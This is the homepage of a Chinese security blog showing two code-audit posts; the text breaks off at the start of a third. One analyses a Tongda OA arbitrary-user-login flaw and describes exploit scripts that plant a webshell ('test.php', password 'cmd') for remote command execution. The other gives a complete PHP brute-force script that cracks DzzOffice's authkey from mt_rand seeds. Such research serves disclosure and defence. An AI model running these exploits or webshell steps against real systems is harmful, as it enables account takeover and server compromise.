index.html

<!DOCTYPE html>


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />


  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />


<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">


  <meta name="keywords" content="Hexo, NexT" />


<meta property="og:type" content="website">
<meta property="og:title" content="zrools">
<meta property="og:url" content="http://yoursite.com/index.html">
<meta property="og:site_name" content="zrools">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="zrools">
<meta name="twitter:card" content="summary">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  <link rel="canonical" href="http://yoursite.com/"/>


  <title>zrools</title>
  

<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  <div class="container sidebar-position-left 
  page-home">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zrools</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

    </ul>
  

</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            
  <section id="posts" class="posts-expand">
    
      
  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/23/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E9%80%9A%E8%BE%BEOA-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E%EF%BC%88%E5%8C%BF%E5%90%8DRCE%EF%BC%89%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/04/23/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E9%80%9A%E8%BE%BEOA-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E%EF%BC%88%E5%8C%BF%E5%90%8DRCE%EF%BC%89%E5%88%86%E6%9E%90/" itemprop="url">代码审计 | 通达OA 任意用户登录漏洞（匿名RCE）分析</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-04-23T16:10:49+08:00">
                2020-04-23
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <p>官网更新了v11.5版本后，漏洞分析和PoC逐渐浮出了水面，其实这漏洞结合后台的一些功能是可以进一步实现匿名RCE的。</p>
<h2 id="漏洞说明"><a href="#漏洞说明" class="headerlink" title="漏洞说明"></a>漏洞说明</h2><p>伪造任意用户（含管理员）登录漏洞的触发点在扫码登录功能，服务端只取了UID来做用户身份鉴别，由于UID是整型递增ID，从而导致可以登录指定UID用户（admin的缺省UID为1）。</p>
<h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h2><p>通达OA v2017、v11.x &lt; v11.5 支持扫码登录版本。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>v11.5更新修复了2个地方：</p>
<ul>
<li>客户端扫码登录接口；</li>
<li>Web端扫码登录接口。</li>
</ul>
<h3 id="Web端扫码登录过程"><a href="#Web端扫码登录过程" class="headerlink" title="Web端扫码登录过程"></a>Web端扫码登录过程</h3><p>Web端扫码登录流程大致是这样：</p>
<ul>
<li><strong>第一步</strong></li>
</ul>
<p>Web端访问 <code>/general/login_code.php?codeuid=随机字符串</code> 生成一个二维码，<code>codeuid</code>作为这个二维码凭证。</p>
<ul>
<li><strong>第二步</strong></li>
</ul>
<p>Web端通过循环请求<code>/general/login_code_check.php</code>，将<code>codeuid</code>发送到服务端，判断是否有人扫了这个二维码。</p>
<ul>
<li><strong>第三步</strong></li>
</ul>
<p>移动端扫码这个二维码，然后将<code>codeuid</code>等数据发送到<code>/general/login_code_scan.php</code>服务端进行保存。</p>
<ul>
<li><strong>第四步</strong></li>
</ul>
<p>Web端通过<code>login_code_check.php</code>取得<code>codeuid</code>等扫码数据后（其实取数据这一步已经产生<code>$_SESSION[&quot;LOGIN_UID&quot;]</code>登录了），再通过Web端发送到<code>logincheck_code.php</code>进行登录。</p>
<p>Web端登录请求脚本如下：</p>
<p><img src="/images/2020/04/23/01.png" alt=""></p>
<p>可以看到最终的登录数据只发送了<code>UID</code>到服务端，从而导致了任意用户登录。</p>
<h3 id="Web端补丁分析"><a href="#Web端补丁分析" class="headerlink" title="Web端补丁分析"></a>Web端补丁分析</h3><p>这里对比一下<code>v11.4</code>和<code>v11.5</code>修复前和修复后的源代码：</p>
<p>源文件： /logincheck_code.php</p>
<p><img src="/images/2020/04/23/02.png" alt=""></p>
<p>修复后的版本对UID进行了初始化，并增加token的校验。</p>
<p>从redis中取得token并进行<code>td_authcode()</code>解密，然后从中取出<code>UID</code>，避免了前段直接控制<code>UID</code>。</p>
<p>再看下token的生成方式，源文件： /general/login_code_scan.php</p>
<p><img src="/images/2020/04/23/03.png" alt=""></p>
<p>通过<code>PHPSESSID</code>从在线用户表<code>user_online</code>中取<code>UID</code>，然后封装数据MD5哈希后存入redis中。</p>
<h3 id="客户端补丁分析"><a href="#客户端补丁分析" class="headerlink" title="客户端补丁分析"></a>客户端补丁分析</h3><p>客户端和Web端大同小异，登录也加了<code>token</code>校验：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;ispirit&#x2F;interface&#x2F;login.php</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/04/23/04.png" alt=""></p>
<p>同样是增加了<code>token</code>校验。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>手动漏洞复现可以在浏览器直接打断点修改数据或者BurpSuite修改。</p>
<p>脚本构造数据包的时候只需两步即可：</p>
<ul>
<li>将数据写入缓存： /general/login_code.php</li>
<li>从缓存读取登录： /logincheck_code.php</li>
</ul>
<h3 id="任意用户登录-PoC"><a href="#任意用户登录-PoC" class="headerlink" title="任意用户登录 PoC"></a>任意用户登录 PoC</h3><p>知道了漏洞过程，那么实现PoC就很简单了，以获取Web目录绝对路径为例：</p>
<ul>
<li>tongda_v11.4_get_webroot_poc.py</li>
</ul>
<p>修改脚本里的<code>oa_addr</code>为目标OA地址，成功后会输出当前OA的安装绝对路径。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ python3 tongda_v11.4_get_webroot_poc.py</span><br><span class="line"></span><br><span class="line">webroot:  C:\\MYOA\\webroot</span><br><span class="line">cookies:  PHPSESSID&#x3D;xxxxx</span><br></pre></td></tr></table></figure>

<h3 id="匿名-RCE-ExP"><a href="#匿名-RCE-ExP" class="headerlink" title="匿名 RCE ExP"></a>匿名 RCE ExP</h3><p>有了后台管理权限和Web目录绝对路径，可以利用MySQL日志进一步写Shell，实现匿名RCE：</p>
<ul>
<li>tongda_v11.4_rce_exp.py</li>
</ul>
<p>修改脚本里的<code>oa_addr</code>为目标OA地址，成功后会在<code>/api/</code>目录下生成一个<code>test.php</code>，密码为：<code>cmd</code>，<code>GET</code>请求方式。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ python3 tongda_v11.4_rce_exp.py</span><br><span class="line"></span><br><span class="line">webroot:  C:\\MYOA\\webroot</span><br><span class="line">cookies:  PHPSESSID&#x3D;xxxxx</span><br><span class="line">webshell: (GET) http:&#x2F;&#x2F;192.168.0.3:8080&#x2F;api&#x2F;test.php?cmd&#x3D;ipconfig</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/04/23/05.png" alt=""></p>
<h2 id="扩展思考"><a href="#扩展思考" class="headerlink" title="扩展思考"></a>扩展思考</h2><p>我们脑洞一下这个补丁是否可以绕过：</p>
<h3 id="认证地址一："><a href="#认证地址一：" class="headerlink" title="认证地址一："></a>认证地址一：</h3><p>源文件： /logincheck_code.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$authInfo &#x3D; $redis-&gt;get(&quot;OA:authcode:token:&quot; . $token);</span><br><span class="line"></span><br><span class="line">$Info &#x3D; td_authcode($authInfo, &quot;DECODE&quot;);</span><br></pre></td></tr></table></figure>

<p>如果我们能找到一个可控的:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TRedis::redis()-&gt;setex($xxx, $xxx);</span><br></pre></td></tr></table></figure>

<p>而<code>td_authcode()</code>的key是固定的，从而就可以伪造<code>token</code>进行任意用户登录。</p>
<h3 id="认证地址二："><a href="#认证地址二：" class="headerlink" title="认证地址二："></a>认证地址二：</h3><p>源文件： /ispirit/login_code_check.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$login_codeuid &#x3D; TD::get_cache(&quot;CODE_LOGIN_PC&quot; . $codeuid);</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">$code_info &#x3D; TD::get_cache(&quot;CODE_INFO_PC&quot; . $login_codeuid);</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">$UID &#x3D; intval($code_info[&quot;uid&quot;]);</span><br></pre></td></tr></table></figure>

<p>如果我们能找到一个可控的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TD::set_cache($xxx, $xxx);</span><br></pre></td></tr></table></figure>

<p>也是可以伪造任意用户登录的。</p>
<hr/>

<p><strong>PoC &amp; ExP 传送门：</strong> <a href="https://github.com/zrools/tools/tree/master/python" target="_blank" rel="noopener">https://github.com/zrools/tools/tree/master/python</a></p>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/16/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-DzzOffice-%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%94%BB%E5%87%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/16/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-DzzOffice-%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%94%BB%E5%87%BB/" itemprop="url">代码审计 | DzzOffice 伪随机数攻击</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-16T13:06:38+08:00">
                2020-03-16
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <h3 id="DzzOffice"><a href="#DzzOffice" class="headerlink" title="DzzOffice"></a>DzzOffice</h3><p>DzzOffice 是一套开源办公套件。</p>
<p>官网： <a href="http://dzz.cc/" target="_blank" rel="noopener">http://dzz.cc/</a></p>
<p>github： <a href="https://github.com/zyx0814/dzzoffice/releases/" target="_blank" rel="noopener">https://github.com/zyx0814/dzzoffice/releases/</a></p>
<p>版本： DzzOffice v2.02</p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>其加解密模块大致和Discuz!旧版本相同，同样存在authkey被爆破攻击，只是攻击方式略有不同。</p>
<p>authkey生成：</p>
<p>源文件： install/index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$authkey &#x3D; substr(md5($_SERVER[&#39;SERVER_ADDR&#39;].$_SERVER[&#39;HTTP_USER_AGENT&#39;].$dbhost.$dbuser.$dbpw.$dbname.$pconnect.substr($timestamp, 0, 6)), 8, 6).random(10);</span><br><span class="line">$_config[&#39;db&#39;][1][&#39;dbhost&#39;] &#x3D; $dbhost;</span><br><span class="line">$_config[&#39;db&#39;][1][&#39;dbname&#39;] &#x3D; $dbname;</span><br><span class="line">$_config[&#39;db&#39;][1][&#39;dbpw&#39;] &#x3D; $dbpw;</span><br><span class="line">$_config[&#39;db&#39;][1][&#39;dbuser&#39;] &#x3D; $dbuser;</span><br><span class="line">$_config[&#39;db&#39;][1][&#39;port&#39;] &#x3D; $port?$port:&#39;3306&#39;;</span><br><span class="line">$_config[&#39;db&#39;][1][&#39;tablepre&#39;] &#x3D; $tablepre;</span><br><span class="line">$_config[&#39;admincp&#39;][&#39;founder&#39;] &#x3D; (string)$uid;</span><br><span class="line">$_config[&#39;security&#39;][&#39;authkey&#39;] &#x3D; $authkey;</span><br><span class="line">$_config[&#39;cookie&#39;][&#39;cookiepre&#39;] &#x3D; random(4).&#39;_&#39;;</span><br><span class="line">$_config[&#39;memory&#39;][&#39;prefix&#39;] &#x3D; random(6).&#39;_&#39;;</span><br></pre></td></tr></table></figure>

<p>源文件： install/include/install_function.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function random($length) &#123;</span><br><span class="line">	$hash &#x3D; &#39;&#39;;</span><br><span class="line">	$chars &#x3D; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz&#39;;</span><br><span class="line">	$max &#x3D; strlen($chars) - 1;</span><br><span class="line">	PHP_VERSION &lt; &#39;4.2.0&#39; &amp;&amp; mt_srand((double)microtime() * 1000000);</span><br><span class="line">	for($i &#x3D; 0; $i &lt; $length; $i++) &#123;</span><br><span class="line">		$hash .&#x3D; $chars[mt_rand(0, $max)];</span><br><span class="line">	&#125;</span><br><span class="line">	return $hash;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>首先通过cookie前缀爆破出随机数种子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$_config[&#39;cookie&#39;][&#39;cookiepre&#39;]</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$str&#x3D;&#39;zRcd&#39;;</span><br><span class="line">$rand_str &#x3D; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz&#39;;</span><br><span class="line"></span><br><span class="line">for ($i &#x3D; 0; $i &lt; strlen($str); $i++) &#123;</span><br><span class="line">    $pos &#x3D; strpos($rand_str, $str[$i]);</span><br><span class="line">    echo $pos.&#39; &#39;.$pos.&#39; &#39;.&#39;0 &#39;.(strlen($rand_str)-1).&#39; &#39;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo &quot;\n&quot;;</span><br></pre></td></tr></table></figure>

<p>php_mt_seed 地址：<a href="https://www.openwall.com/php_mt_seed/" target="_blank" rel="noopener">https://www.openwall.com/php_mt_seed/</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;php_mt_seed 61 61 0 61 17 17 0 61 38 38 0 61 39 39 0 61 &gt; seeds.txt</span><br></pre></td></tr></table></figure>

<p>接着打开登录界面，F12打开控制台，然后在cookie里取得seccodeXXX和对的值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.write(&#39;&lt;img src&#x3D;&quot;misc.php?mod&#x3D;seccode&amp;update&#x3D;82310&amp;idhash&#x3D;Sz4Dyn80&quot; class&#x3D;&quot;img-seccode&quot; title&#x3D;&quot;刷新验证码&quot; alt&#x3D;&quot;&quot; width&#x3D;&quot;150&quot; height&#x3D;&quot;34&quot;&gt;&#39;);</span><br></pre></td></tr></table></figure>

<p>通过验证码获取一对密文和明文在本地爆破，seccode生成格式如下：</p>
<p>源文件： core/function/function_seccode.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dsetcookie(&#39;seccode&#39;.$idhash, authcode(strtoupper($seccode).&quot;\t&quot;.(TIMESTAMP - 180).&quot;\t&quot;.$idhash.&quot;\t&quot;.FORMHASH, &#39;ENCODE&#39;, $_G[&#39;config&#39;][&#39;security&#39;][&#39;authkey&#39;]), 0, 1, true);</span><br></pre></td></tr></table></figure>

<p>然后只需要本地暴力跑authkey前6位验证idhash就可以了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$pre &#x3D; &#39;zRcd&#39;;</span><br><span class="line">$seccode &#x3D; substr(&#39;zRcd_2132_seccodeSz4Dyn80&#39;, -8);</span><br><span class="line">$string &#x3D; &#39;4b57rnl5TRniqDPTjZ5wt7rDw0IJVQEFlVoJwW4LXvaKOfwiQXpiJEBs2mqSUyFXwlzq-6_lrtmfcwesn0E&#39;;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; $key &#x3D; &#39;fa5f4fcFeIwLv0GT&#39;;</span><br><span class="line">&#x2F;&#x2F; $res &#x3D; authcode_decode($string, $key);</span><br><span class="line"></span><br><span class="line">$seeds &#x3D; explode(&quot;\n&quot;, file_get_contents(&#39;seeds.txt&#39;));</span><br><span class="line"></span><br><span class="line">for ($i &#x3D; 0; $i &lt; count($seeds); $i++) &#123;</span><br><span class="line">    if(preg_match(&#39;&#x2F;&#x3D; (\d+) &#x2F;&#39;, $seeds[$i], $matach)) &#123;</span><br><span class="line">        mt_srand(intval($matach[1]));</span><br><span class="line">        $authkey &#x3D; random(10);</span><br><span class="line">        echo $authkey;</span><br><span class="line">        if(random(4) &#x3D;&#x3D; $pre)&#123;</span><br><span class="line">            echo &quot;trying $authkey...\n&quot;;</span><br><span class="line">            $res &#x3D; crack($string, $authkey, $seccode);</span><br><span class="line">            if($res) &#123;</span><br><span class="line">                echo &quot;authkey found: &quot;.$res;</span><br><span class="line">                exit();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function crack($string, $authkey, $seccode) &#123;</span><br><span class="line">    $chrs &#x3D; &#39;1234567890abcdef&#39;;</span><br><span class="line">    for ($a &#x3D; 0; $a &lt; 16; $a++) &#123;</span><br><span class="line">        for ($b &#x3D; 0; $b &lt; 16; $b++) &#123;</span><br><span class="line">            for ($c &#x3D; 0; $c &lt; 16; $c++) &#123;</span><br><span class="line">                for ($d &#x3D; 0; $d &lt; 16; $d++) &#123;</span><br><span class="line">                    for ($e &#x3D; 0; $e &lt; 16; $e++) &#123;</span><br><span class="line">                        for ($f &#x3D; 0; $f &lt; 16; $f++) &#123;</span><br><span class="line">                            $key &#x3D; $chrs[$a].$chrs[$b].$chrs[$c].$chrs[$d].$chrs[$e].$chrs[$f].$authkey;</span><br><span class="line">                            $result &#x3D; authcode_decode($string, $key);</span><br><span class="line">                            if (strpos($result, &quot;\t$seccode\t&quot;)) &#123;</span><br><span class="line">                                return $key;</span><br><span class="line">                            &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    return false;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function authcode_decode($string, $key) &#123;</span><br><span class="line">    $key &#x3D; md5($key);</span><br><span class="line">    $ckey_length &#x3D; 4;</span><br><span class="line">    $keya &#x3D; md5(substr($key, 0, 16));</span><br><span class="line">    $keyc &#x3D; substr($string, 0, $ckey_length);</span><br><span class="line"></span><br><span class="line">    $cryptkey &#x3D; $cryptkey &#x3D; $keya . md5($keya . $keyc);</span><br><span class="line">    $key_length &#x3D; strlen($cryptkey);</span><br><span class="line"></span><br><span class="line">    $string &#x3D; base64_decode(substr(str_replace(array(&#39;_&#39;, &#39;-&#39;), array(&#39;&#x2F;&#39;, &#39;+&#39;), $string), $ckey_length));</span><br><span class="line">    $string_length &#x3D; strlen($string);</span><br><span class="line"></span><br><span class="line">    $result &#x3D; &#39;&#39;;</span><br><span class="line">    $box &#x3D; range(0, 255);</span><br><span class="line"></span><br><span class="line">    $rndkey &#x3D; array();</span><br><span class="line">    for ($i &#x3D; 0; $i &lt;&#x3D; 255; $i++) &#123;</span><br><span class="line">        $rndkey[$i] &#x3D; ord($cryptkey[$i % $key_length]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    for ($j &#x3D; $i &#x3D; 0; $i &lt; 256; $i++) &#123;</span><br><span class="line">        $j &#x3D; ($j + $box[$i] + $rndkey[$i]) % 256;</span><br><span class="line">        $tmp &#x3D; $box[$i];</span><br><span class="line">        $box[$i] &#x3D; $box[$j];</span><br><span class="line">        $box[$j] &#x3D; $tmp;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    for ($a &#x3D; $j &#x3D; $i &#x3D; 0; $i &lt; $string_length; $i++) &#123;</span><br><span class="line">        $a &#x3D; ($a + 1) % 256;</span><br><span class="line">        $j &#x3D; ($j + $box[$a]) % 256;</span><br><span class="line">        $tmp &#x3D; $box[$a];</span><br><span class="line">        $box[$a] &#x3D; $box[$j];</span><br><span class="line">        $box[$j] &#x3D; $tmp;</span><br><span class="line">        $result .&#x3D; chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    return $result;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function random($length) &#123;</span><br><span class="line">    $hash &#x3D; &#39;&#39;;</span><br><span class="line">    $chars &#x3D; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz&#39;;</span><br><span class="line">    $max &#x3D; strlen($chars) - 1;</span><br><span class="line">    for($i &#x3D; 0; $i &lt; $length; $i++) &#123;</span><br><span class="line">        $hash .&#x3D; $chars[mt_rand(0, $max)];</span><br><span class="line">    &#125;</span><br><span class="line">    return $hash;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跑得会相对会比较慢一些，需要注意PHP版本。</p>
<p>参考：</p>
<ul>
<li><a href="https://www.anquanke.com/post/id/86679" target="_blank" rel="noopener">https://www.anquanke.com/post/id/86679</a></li>
</ul>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/11/%E5%B8%B8%E8%A7%81%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8F%A3%E4%B8%8E%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
